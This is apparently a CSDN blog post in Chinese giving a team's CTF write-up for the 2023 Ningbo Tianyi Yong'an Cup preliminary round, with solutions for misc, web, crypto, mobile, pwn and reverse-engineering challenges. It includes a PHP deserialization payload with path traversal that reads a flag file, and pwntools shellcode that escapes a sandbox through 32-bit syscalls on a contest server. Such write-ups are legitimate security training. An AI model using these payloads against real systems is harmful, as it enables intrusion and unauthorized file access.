宁波天一永安杯初赛 wp-AGCTS战队

最新推荐文章于 2024-07-09 23:47:49 发布
最新推荐文章于 2024-07-09 23:47:49 发布
阅读量987 收藏 1
点赞数 1
分类专栏: 比赛 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/akxnxbshai/article/details/131339745
版权

文章目录

MISC

Zip

ARCHPR 直接数字爆破,得到二进制密码,得 flag

image-20230622121122780

SimpleDocument

Kali binwalk 发现里面有一 pdf 文件,foremost 分离,在线网站 pdf 解密

PDF转换为文本 - 迅捷,在线,免费 - PDF24 Tools

image-20230622121201977

BeautifulImage

Kali zsteg 有一串 base64 字符串,直接解密得到 flag

image-20230622121223534

image-20230622121228587

Web

Deserialization

发现代码,首先读取 route.php 的内容。

image-20230622121303932

image-20230622121312016

继续读取 h1nt.php 的代码。

image-20230622121328621

image-20230622121338646

在$input2 = clone $input 可跳入到__clone 函数,即可读取文件。 Paylaod: read=h1nt.php&input=O:4:“test”:1:{s:8:“position”;s:33:“…/…/…/…/var/www/html/f14g.php”;}

image-20230622121351330

在源码里可以看到 flag。

image-20230622121412123

CodeCheck

源码里发现代码,直接利用 php://input 绕过 if 语句,然后读取 index.php 得到 flag。

image-20230622121444030

Crypto

Secret

简单的 rsa,和之前郑州轻工业大学校赛的一样,不过这里的 e=28,所以要进行四次转换。 脚本如下:

from gmpy2 import *
import libnum
e=28
p=1342611187967895478514784070906400740222141326820004301363837959819428848530
008261711899061028663230440783489334190385437193619233206949749706004264507558
458392359491673919879703308360047683607746764249585549466997675821055562391774
50470656065560178592346659948800891455240736405480828554486592172443394370831
q=1478474445341521289975469316022922660947408893471541924205549046518133409157
443281041000653732943467239643567364367099348717411613282869441502427334455422
282930364046575561688447235218158366893871848568710910254348967106056885948474
00051686361372872763001355411405782508020591933546964183881743133374126947753
c=1391339636675501060704347755257726827792824131910121538166233149804608062590
283120248664602076756892188118512489496024286725416292760541622846010839908740
698925803701763961919550671109001287745413138356883275060610290111078204552926
794050447132284736480809479066269678547059489224471613720378189028421687403548
630250604226345325558047538074295920131400378855369297791435799698211832858711
912414418129075338939414923538104538969684147148394731066332999387304612313458
714966134799977495810509110380637570238708414930954235154102114011104840824812
1408401601979108510758891595550054699719801708646232427198902271953673874
a=invert(e//4,(p-1)*(q-1))
b=pow(c,a,p*q)
c=iroot(b,4)[0]
print(c)
print(libnum.n2s(int(c)))

运行后得到 flag。

Rsa

本题直接把 a 给了,直接写脚本:

from gmpy2 import *
import libnum
n=3653555884708271990120156103118183534657457661095071392492427294775919357636
581776298092763869169660129308953731505541374678819020887523479422911904905629
955186486987029163494124636243649100690434755955949470592225900729912664081727
5929491680601926404543198957206717290905220235571289759182878331893962038379
c=5329978729404522821890434300080027936947884398224653025322087542310057990579
72378308576109082463996551992533174546386979606697890310597738637156771564229
a=2694858406312563434474553988904403597551484373358339092528913028454100111881
368126493990657117571672510331411186745639563619323775673115439
e = 65537
d = invert(e,a-1)
x=pow(c,d,a)
print(libnum.n2s(int(x)))

image-20230622121546723

Mobile

Peacock

Apk 后缀改为 zip 解压 lib 文件中随便拉个 so 进 ida shif+F12

image-20230622121635091

看到这两行推测 base64 转码表直接跑脚本

import base64
a = 
list("AB+/abcdefg0123456789OPQRSTUVWXYZCDEFGhijklmnopqrst
uvwxyzHIJKLMN")
b = ''.join(a) 
c = 
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123
456789+/'
s = 
'ShsCSyoDREau3/5zSh9v3caw18RH2hat3PeHSEeySh6C2PRwSQv='
c = str.maketrans(b, c)
print(base64.b64decode(s.translate(c)))

pwn

wingtip

程序为 64 位,采用 32 位的系统调用完成逃逸脚本如下:

a1 = "flag{04977e9482f9c16040da8b52a5ea3e35}"
print(len(a1))
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
#p=process("./pwn1")
p=remote("node.nsctf.cn",57981)
shellcode=asm("""
 mov rsp,0x101000;
""")
shellcode+=asm(shellcraft.amd64_to_i386())
context.clear()
context.update(arch="i386")
shellcode+=asm(shellcraft.cat("/flag"))
p.send(shellcode)
p.interactive()

运行得 flag。

image-20230622121730038

RE

Polenta

Ida 打开

image-20230622122300059

看起来像 tea 加密 ,网上 copy 脚本

(2条消息) C语言实现TEA系列加解密算法_P1umH0的博客-CSDN博客

Main 函数稍作修改,直接套用 btea 解密

#include <stdio.h>
#include <stdint.h>
#define DELTA 0x9e3779b9
#define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) +
(key[(p & 3) ^ e] ^ z)))
void btea(uint32_t* v, int n, uint32_t const key[4])
{
uint32_t y, z, sum;
unsigned p, rounds, e;
//加密
if (n > 1)
{
rounds = 6 + 52 / n;
sum = 0;
z = v[n - 1];
do
{
sum -= 0x61C88647;
if (sum >> 31 == 0) {
sum ^= 0x9876543;
}
e = (sum >> 2) & 3;
for (p = 0; p < n - 1; p++)
{
y = v[p + 1];
z = v[p] += MX;
}
y = v[0];
z = v[n - 1] += MX;
} while (--rounds);
}
//解密
else if (n < -1)
{
n = -n;
rounds = 6 + 52 / n;
sum = 0xc6d01432;
y = v[0];
do
{
e = (sum >> 2) & 3;
for (p = n - 1; p > 0; p--)
{
z = v[p - 1];
y = v[p] -= MX;
}
z = v[n - 1];
y = v[0] -= MX;
if (sum >> 31 == 0) {
sum ^= 0x9876543;
}
sum += 0x61C88647;
} while (--rounds);
}
printf("sum==0x%x\n", sum);
}
int main()
{
uint32_t v[] =
{ 0x9e43b891,0xa937eaf1,0xddc46c84,0x713ddfda,0xe0072e3e,0xc8ad42c1,0xa
79faced,0x951dae4e,0xe7d0ab88,0x1365466d };
uint32_t k[4] = { 0x12345678, 0x90ABCDEF, 0xDEADBEEF, 0x87654321 };
int n = sizeof(v) / sizeof(uint32_t);
btea(v, -n, k);
for (int i = 0; i < n; i++)
{
for (int j = 0; j < sizeof(uint32_t) / sizeof(uint8_t); j++)
{
printf("%c", (v[i] >> (j * 8)) & 0xFF);
}
}
return 0;
}

运行得 flag:flag{04977e9482f9c16040da8b52a5ea3e35}

f0njl
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用复杂结构井开发永安油田永3-1断块剩余油 (2013年)
04-21
永安油田永3-1断块属于典型的复杂断块油藏,经过30多年的开发,目前进入特高含水阶段,剩余油规模小且高度分散,直井挖潜难度大。根据永3-1断块剩余油分布情况,优化设计了绕锥水平井、跨断层阶梯水平井、跨断层多靶点...
vue-shopping-list:永安购物清单练习
05-14
购物清单 可以进行Y&A练习的购物清单。 与拥有JSON对象的expressJS服务器一起使用。 基于Vue-CLI 与JSON服务器一起运行 npm run dev-with-json-server 构建设置 # install dependencies npm install ...
2023宁波市赛 天一永安杯赛前模拟题部分wp
arcuied
05-16 4908
天一永安杯赛前模拟题 wp
天一永安杯”2023宁波市第六届网络安全大赛 re wp
Todog的博客
05-28 713
这里会看高位是0还是1,0就会触发异常,我们的sum会进行异或。一直f7,循环就跳过。upx壳,被魔改了。so文件比对,base64直接解。发现有花指令,全patch掉。发现是RC4,但是有改动。然后就可以正常f5看了。
2024“天一永安杯“宁波第七届网络安全大赛极安云科部分WP(1)
2401_84970268的博客
05-11 180
key和key1用crypto1算法混淆,再用cry2算法吧加密后的key混淆。第一个脚本得到加密flag的key,使用第二个脚本解出flag。修改UPX特征码后upx -d脱壳,IDA分析,rc4改了轮数。并且key在加密之前修改了。
2023年宁波市网络安全大赛(天一永安杯)-训练赛
weixin_52961098的博客
05-16 990
写给新生看的,步骤又乱又多,不喜勿喷,我也不改,爱看不看。
2023宁波市网络安全大赛天一永安杯部分练习题WP
一位热爱网安的年轻人的博客
05-16 654
宁波市网络安全大赛 天一永安杯练习题wp
2023天一永安杯部分wp
arcuied
05-22 1409
布尔盲注。
2024“天一永安杯“宁波第七届网络安全大赛极安云科部分WP
Geek极安云科-致力于网络安全事业
05-05 1183
天一永安杯”2024 宁波第七届网络安全大赛暨第九届大学生网络技术与信息安全大赛大赛竞赛形式一、线上初赛参赛人员:各单位自行选拔3人(设长1名)组成团,不足3人不允许参赛。竞赛时间:8:30-12:00(比赛3个小时,不含签到时间)竞赛模式:CTF解题模式(排名图为赛时截的,最终排名应该是50多,行业组排30多)Geek极安云科WriteUp解题情况:Web1、Web2、RE1、RE2、CY1、MISC1。
20210328-东北证券-永安行-603776-共享单车高潮落幕,有桩出行一枝独秀.pdf
04-08
20210328-东北证券-永安行-603776-共享单车高潮落幕,有桩出行一枝独秀.pdf
城市设计资料-阅天府新区永安组团城市设计
11-24
【标题】:“城市设计资料-阅天府新区永安组团城市设计”所涵盖的知识点主要集中在城市规划、设计原则以及GIS技术的应用。 城市设计是城乡建设的重要环节,它涉及到空间布局、功能分区、交通组织、环境景观等多个...
某大型连锁企业域渗透
Ms08067安全实验室
07-04 1014
点击星标,即时接收最新推文本文选自《内网安全攻防:红之路》扫描二维码五折购书实域渗透测试流程对黑客来说,拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段,从而一步步拿下域控制器的呢?本次将从一张拓扑图开始,和大家一起梳理域的相关知识,并串联内网的各类攻击技术。实验环境概述 下图是一张某公司(虚构名:北京test公司)的网络拓扑示意图。该公司员工...
什么是RPC?有哪些RPC框架?
最新发布
yuiezt的专栏
07-09 428
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
如何用Java写一个整理Java方法调用关系网络的程序
qq_42349895的博客
07-06 856
最近遇到了一个问题,大致是这样的:如果给你一个 java 方法,如何找到有哪些菜单在使用。我的第一想法是,这不很简单吗?!使用 IDEA 自带的右键 Find Usage 功能,一步一步往上溯源最终找到 Controller 中的方法,找到 requestMapping 的映射路径,然后去数据库一查便知。
wordpress网站添加一个临时维护功能
爱酷码的博客
07-07 255
有时遇到一些情况,比如站点需要闭站备案、或者被要求停站等等,我们就可以使用本文的功能,使我们的 wordpress 站点一键进入站点维护模式:打开站点的任意链接都显示“站点维护中”的字眼,而且返回 503 响应码比整站关闭对搜索引擎更加友好~把以下代码放到functions.php文件中,主要用网站临时维护或者用于备案。事情做好了,把以下代码删除即可!
30、PHP 实现 左旋转字符串、翻转单词顺序列
weixin_44010641的博客
07-06 214
后来才意识到,这家伙原来把句子单词的顺序翻转了,正确的句子应该是“I am a student.”。例如,字符序列S=”abcXYZdef”,要求输出循环左移3位后的结果,即“XYZdefabc”。对于一个给定的字符序列S,请你把其循环左移K位后的序列输出。同事Cat对Fish写的内容颇感兴趣,有一天他向Fish借来翻看,但却读不懂它的意思。公司最近来了一个新员工Fish,每天早晨总是会拿着一本英文杂志,写些句子在本子上。汇编语言中有一种移位指令叫做循环左移(ROL),现在有个简单的任务,
文件贯彻落实情况汇报.docx
11-21
"永安公司下属的安阳永安王海地煤矿有限公司对《关于加强兼并重组煤矿安全管理的若干规定》等五个文件进行了深入学习和落实,重点围绕安全管理机构建设、责任落实、安全培训和现场管理等方面展开工作。" 这篇文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

f0njl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值